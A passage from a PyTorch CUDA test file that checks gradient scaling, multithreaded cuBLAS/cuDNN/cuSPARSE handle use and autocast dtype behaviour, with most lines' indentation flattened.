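        scaler.scale(loss).backward()   # backward produces scaled grads
        scaler.step(optimizer)          # unscales grads, skips the step if inf/nan was found
        scaler.update()                 # grows or backs off the scale for the next iteration
    return scaler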
def test_grad_scaling_unscale_sparse(self, device="cuda", dtype=torch.float):
scaler = torch.cuda.amp.GradScaler()
inv_scale = torch.full((1,), 0.25, dtype=dtype, device=device)
found_inf = torch.empty((1,), dtype=dtype, device=device)
cur = found_inf.device
# As of d0c925f (4/16/20), docs are unclear about best API for sparse cuda tensor construction.
# https://pytorch.org/docs/master/tensors.html shows torch.sparse_coo_tensor(...), but it has no docstring.
# The same page shows several tensors with layout=torch.sparse_coo, but no constructors using that layout.
# Meanwhile, https://pytorch.org/docs/master/sparse.html shows torch.sparse.FloatTensor(...), which looks
# legacy and does not accept a device="cuda" kwarg. Going with torch.sparse_coo_tensor.
i = torch.tensor([[0, 1, 1],
[2, 0, 2]], device="cuda", dtype=torch.int64)
v = torch.tensor([16., 32., 64.], device="cuda", dtype=torch.float)
s = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
p = s.clone()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s / 4).to_dense())
v = torch.FloatTensor([16., 32., float('inf')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
v = torch.FloatTensor([16., 32., float('nan')])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=dtype)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, False)[cur]
self.assertEqual(found_inf, 1.0)
p = s.clone().half()
assert p.is_sparse
opt = torch.optim.SGD([p], lr=1.)
p.grad = s.clone().half()
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 0.0)
self.assertEqual(p.grad.to_dense(), (s.half() / 4).to_dense())
# Creates fp16 sparse tensor with duplicated indices (uncoalesced). The uncoalesced representation
# does not overflow in fp16, but the coalesced representation would, because 64000 + 64000 > fp16 max.
# _amp_non_finite_check_and_unscale_ should report an overflow here.
i = torch.LongTensor([[0, 1, 0],
[2, 0, 2]])
v = torch.FloatTensor([64000., 32., 64000.])
p.grad = torch.sparse_coo_tensor(i, v, torch.Size([2, 3]), device="cuda", dtype=torch.float16)
found_inf.zero_()
found_inf = scaler._unscale_grads_(opt, inv_scale, found_inf, True)[cur]
self.assertEqual(found_inf, 1.0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_device_as_key(self):
# Ensure that different instances of "device" objects that point to the same device
# are treated as identical keys by dicts. GradScaler relies on this behavior, and may
# error otherwise in a way that's difficult to detect (a silent performance hit).
d = {}
t = torch.empty((1,), device="cuda:0")
dev0a = torch.device("cuda:0")
dev0b = torch.device("cuda:0")
dev1a = torch.device("cuda:1")
dev1b = torch.device("cuda:1")
self.assertTrue(hash(dev0a) == hash(dev0b))
self.assertTrue(hash(dev1a) == hash(dev1b))
d[dev0a] = "0a"
d[dev0b] = "0b"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "0b")
d[t.device] = "t"
self.assertTrue(len(d) == 1)
self.assertTrue(d[dev0a] == "t")
d[dev1a] = "1a"
d[dev1b] = "1b"
self.assertTrue(len(d) == 2)
self.assertTrue(d[dev1a] == "1b")
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_scale(self):
scaler = torch.cuda.amp.GradScaler(init_scale=2.)
t0 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0")
t1 = torch.full((1,), 4.0, dtype=torch.float32, device="cuda:1")
# Create some nested iterables of tensors on different devices.
outputs = (t1.clone(), (t0.clone(), t1.clone()), [t0.clone(), (t1.clone(), t0.clone())])
outputs = scaler.scale(outputs)
self.assertTrue(outputs[0] == 8.0 and outputs[1][0] == 8.0 and outputs[1][1] == 8.0 and
outputs[2][0] == 8.0 and outputs[2][1][0] == 8.0 and outputs[2][1][1] == 8.0)
self.assertTrue(scaler._scale.device == t1.device)
def test_grad_scaling_state_dict(self):
for lazy_init_scale in True, False:
s0 = torch.cuda.amp.GradScaler(init_scale=3., growth_factor=4., backoff_factor=.5, growth_interval=2)
s1 = torch.cuda.amp.GradScaler(init_scale=6., growth_factor=7., backoff_factor=.8, growth_interval=1)
# sets a random value for load_state_dict to overwrite
s1._init_growth_tracker = 7
if lazy_init_scale:
# Dummy scale() call to ensure the scale tensor is lazily initialized.
s1.scale(torch.full((1,), 4.0, dtype=torch.float32, device="cuda:0"))
self.assertTrue(isinstance(s1._scale, torch.cuda.FloatTensor))
s1.load_state_dict(s0.state_dict())
self.assertEqual(s1.get_scale(), 3.)
self.assertEqual(s1.get_growth_factor(), 4.)
self.assertEqual(s1.get_backoff_factor(), .5)
self.assertEqual(s1.get_growth_interval(), 2)
self.assertEqual(s1._init_growth_tracker, 0)
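# Illustrative sketch (not part of the test suite): state_dict()/load_state_dict() are
# what user code calls when checkpointing, alongside the model and optimizer states.
# `model`, `optimizer`, `scaler` and `path` are assumed to exist; the sketch name is
# hypothetical.
def _sketch_scaler_checkpoint_roundtrip(model, optimizer, scaler, path):
    torch.save({'model': model.state_dict(),
                'optimizer': optimizer.state_dict(),
                'scaler': scaler.state_dict()}, path)
    checkpoint = torch.load(path)
    model.load_state_dict(checkpoint['model'])
    optimizer.load_state_dict(checkpoint['optimizer'])
    scaler.load_state_dict(checkpoint['scaler'])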
def _create_scaling_models_optimizers(self, device="cuda"):
# Create a module+optimizer that will use scaling, and a control module+optimizer
# that will not use scaling, against which the scaling-enabled module+optimizer can be compared.
mod_control = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
mod_scaling = torch.nn.Sequential(torch.nn.Linear(8, 8), torch.nn.Linear(8, 8)).to(device=device)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
s.data.copy_(c.data)
opt_control = torch.optim.SGD(mod_control.parameters(), lr=1.0)
opt_scaling = torch.optim.SGD(mod_scaling.parameters(), lr=1.0)
return mod_control, mod_scaling, opt_control, opt_scaling
def _create_scaling_case(self, device="cuda", dtype=torch.float):
data = [(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device)),
(torch.randn((8, 8), dtype=dtype, device=device), torch.randn((8, 8), dtype=dtype, device=device))]
loss_fn = torch.nn.MSELoss().cuda()
skip_iter = 2
return self._create_scaling_models_optimizers(device=device) + (data, loss_fn, skip_iter)
# _run_scaling_case generalizes some single-optimizer test logic to avoid too much copy-pasting below.
def _run_scaling_case(self, run, unskipped, skipped, atol=1e-7):
# Ensure scaling can be disabled without changing user control flow.
for enabled in True, False:
mod_control, mod_scaling, opt_control, opt_scaling, data, loss_fn, skip_iter = self._create_scaling_case()
# For functionality, test with a modest initial scale, and an unrealistically-large growth factor
# so any potential errors with the growth factor handling will be magnified.
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
_ = run(data, mod_control, opt_control, scaler, loss_fn, skip_iter, False)
ret = run(data, mod_scaling, opt_scaling, scaler, loss_fn, skip_iter, True)
# Allows run() to optionally return a different scaler instance.
scaler = ret if ret else scaler
# If scaling was enabled, the scale factor should have been multiplied by the growth factor
# len(data) - skipped times and the backoff factor "skipped" times.
if enabled:
net_growth = scaler.get_growth_factor()**unskipped if unskipped > 0 else 1.0
net_backoff = scaler.get_backoff_factor()**skipped if skipped > 0 else 1.0
self.assertTrue(scaler.get_scale() == (128. * net_growth * net_backoff))
else:
self.assertTrue(scaler.get_scale() == 1.0)
for c, s in zip(mod_control.parameters(), mod_scaling.parameters()):
self.assertEqual(c, s, atol=atol, rtol=1e-05)
# Compares no scaling + no autocasting against scaling + autocasting.
def test_grad_scaling_autocast(self):
try_pickle = False
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
with torch.autocast('cuda', enabled=try_scaling_api):
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
if try_pickle:
scaler = pickle.loads(pickle.dumps(scaler))
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
return scaler
# sets atol=1e-3 because we're comparing pure fp32 arithmetic vs a mixture of fp16 and fp32
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
# this will be picked up by try_pickle within run():
try_pickle = True
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-3)
def test_grad_scaling_clipping(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm * scaler.get_scale())
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1, atol=1e-5)
def test_grad_scaling_clipping_separate_unscale(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
max_norm = 0.2 # A reasonable value that actually has an effect, based on printouts of grads
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.unscale_(optimizer)
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm, error_if_nonfinite=False)
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm)
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
@unittest.skipIf(IS_WINDOWS, 'FIXME: fix this test for Windows')
def test_grad_scaling_penalty(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer.zero_grad()
output = model(input)
loss = loss_fn(output, target)
if try_scaling_api:
grad_params = torch.autograd.grad(scaler.scale(loss),
model.parameters(), create_graph=True)
inv_scale = 1. / scaler.get_scale()
grad_params = [p * inv_scale for p in grad_params]
else:
grad_params = torch.autograd.grad(loss, model.parameters(), create_graph=True)
grad_norm = 0
for grad in grad_params:
grad_norm += grad.pow(2).sum()
grad_norm = grad_norm.sqrt()
loss = loss + grad_norm
if try_scaling_api:
scaler.scale(loss).backward()
if i == skip_iter and scaler.is_enabled():
model[1].weight.grad.data.fill_(float('inf'))
scaler.step(optimizer)
scaler.update()
else:
loss.backward()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer.step()
self._run_scaling_case(run, unskipped=3, skipped=1)
def test_grad_scaling_accumulation(self):
def run(data, model, optimizer, scaler, loss_fn, skip_iter, try_scaling_api):
iters_to_accumulate = 2
for i, (input, target) in enumerate(data):
output = model(input)
loss = loss_fn(output, target)
loss = loss / iters_to_accumulate
if try_scaling_api:
scaler.scale(loss).backward()
else:
loss.backward()
if (i + 1) % iters_to_accumulate == 0:
if try_scaling_api:
scaler.step(optimizer)
scaler.update()
optimizer.zero_grad()
else:
optimizer.step()
optimizer.zero_grad()
self._run_scaling_case(run, unskipped=2, skipped=0)
def test_grad_scaling_multiple(self):
# Tests gradient scaling with 2 models and 2 optimizers that both receive gradients from 2 losses.
# Some of the logic here cannot reuse the generic helper functions created for the 1-optimizer cases.
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers()
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input)
loss0 = loss_fn(0.3 * output0 + 0.7 * output1, target)
loss1 = loss_fn(0.6 * output0 - 0.4 * output1, target)
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == ((128. * scaler.get_growth_factor()**3 *
                scaler.get_backoff_factor()**1) if enabled else 1.0))
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_grad_scaling_multigpu(self):
# Same as above, but runs some of the models on device 1.
# GradScaler should transparently handle losses and gradients on multiple devices.
# This test could be combined with the test above, but I think it makes sense to treat
# multi-GPU operations separately.
dev0 = torch.device("cuda:0")
dev1 = torch.device("cuda:1")
for enabled in True, False:
mod_control0, mod_scaling0, opt_control0, opt_scaling0, data, loss_fn, skip_iter = \
self._create_scaling_case()
mod_control1, mod_scaling1, opt_control1, opt_scaling1 = \
self._create_scaling_models_optimizers(device=dev1)
scaler = torch.cuda.amp.GradScaler(init_scale=128., growth_factor=2.0, enabled=enabled, growth_interval=1)
def run(model0, model1, optimizer0, optimizer1, try_scaling_api):
for i, (input, target) in enumerate(data):
optimizer0.zero_grad()
optimizer1.zero_grad()
output0 = model0(input)
output1 = model1(input.to(dev1))
loss0 = loss_fn(0.3 * output0 + 0.7 * output1.to(dev0), target)
loss1 = loss_fn(0.6 * output0.to(dev1) - 0.4 * output1, target.to(dev1))
if try_scaling_api:
scaler.scale(loss0).backward(retain_graph=True)
scaler.scale(loss1).backward()
if i == skip_iter and scaler.is_enabled():
model1[1].weight.grad.data.fill_(float('inf'))
# As an additional stress test, separately unscale for one of the optimizers.
scaler.unscale_(optimizer0)
scaler.step(optimizer0)
scaler.step(optimizer1)
# Make sure the found_infs were collected properly across optimizers and devices.
if scaler.is_enabled():
self.assertTrue(len(scaler._found_inf_per_device(optimizer0)) == 1)
self.assertTrue(len(scaler._found_inf_per_device(optimizer1)) == 1)
self.assertTrue(scaler._found_inf_per_device(optimizer0)[dev0].item() == 0.)
self.assertTrue(scaler._found_inf_per_device(optimizer1)[dev1].item() ==
float(i == skip_iter))
scaler.update()
else:
loss0.backward(retain_graph=True)
loss1.backward()
optimizer0.step()
if (not scaler.is_enabled()) or (i != skip_iter):
optimizer1.step()
run(mod_control0, mod_control1, opt_control0, opt_control1, False)
run(mod_scaling0, mod_scaling1, opt_scaling0, opt_scaling1, True)
# The loss scale should have been multiplied by the growth factor 3 times and the backoff factor once.
self.assertTrue(scaler.get_scale() == ((128. * scaler.get_growth_factor()**3 *
                scaler.get_backoff_factor()**1) if enabled else 1.0))
# Copy mod_control1 and mod_scaling1 back to device 0 for comparison
mod_control1.to(dev0)
mod_scaling1.to(dev0)
for c, s in zip(chain(mod_control0.parameters(), mod_control1.parameters()),
chain(mod_scaling0.parameters(), mod_scaling1.parameters())):
self.assertEqual(c, s, rtol=1e-5, atol=1e-7)
def test_cublas_multiple_threads_same_device(self):
# Note: these parameters should be very carefully tuned.
# Too small a number makes it hard for the race condition
# to happen, while too large a number sometimes causes a hang.
size = 1024
num_threads = 2
trials = 3
test_iters = 100
weight = torch.ones((size, size), device='cuda')
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cusparse handle,
# the following sequence may occur:
# thread 0 calls cusparseSetStream()
# thread 1 calls cusparseSetStream()
# thread 0 launches its raw spmm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS in its own stream,
# but actually now races with its spmm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
fast_dtype = torch.bfloat16 if run_as_type == torch.bfloat16 else torch.float16
self.assertFalse(torch.is_autocast_enabled())
with torch.autocast('cuda', dtype=fast_dtype):
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.autocast('cuda', enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
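# Illustrative sketch (not part of the test suite): the behavior the helper above checks
# op-by-op -- inside an autocast region, eligible fp32 inputs run in the lower-precision
# dtype, and the autocast state does not leak out of the region. The sketch name is
# hypothetical.
def _sketch_autocast_region():
    a = torch.randn(8, 8, device='cuda')
    b = torch.randn(8, 8, device='cuda')
    with torch.autocast('cuda', dtype=torch.float16):
        out = torch.mm(a, b)            # mm falls under the fp16 cast policy
        assert out.dtype is torch.float16
    assert not torch.is_autocast_enabled()
    return out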
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
should_error_from_not_implemented = 'cudnn' in op or 'prelu' in op or 'thnn' in op \
or 'fused' in op or 'gru' in op or op == '_thnn_fused_lstm_cell' or op == 'lstm_cell'
if not skip_test:
if should_error_from_not_implemented:
with self.assertRaises(RuntimeError, msg=str(op) + ' should not be supported for bfloat16!'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.autocast('cuda'):
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.autocast('cuda'):
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
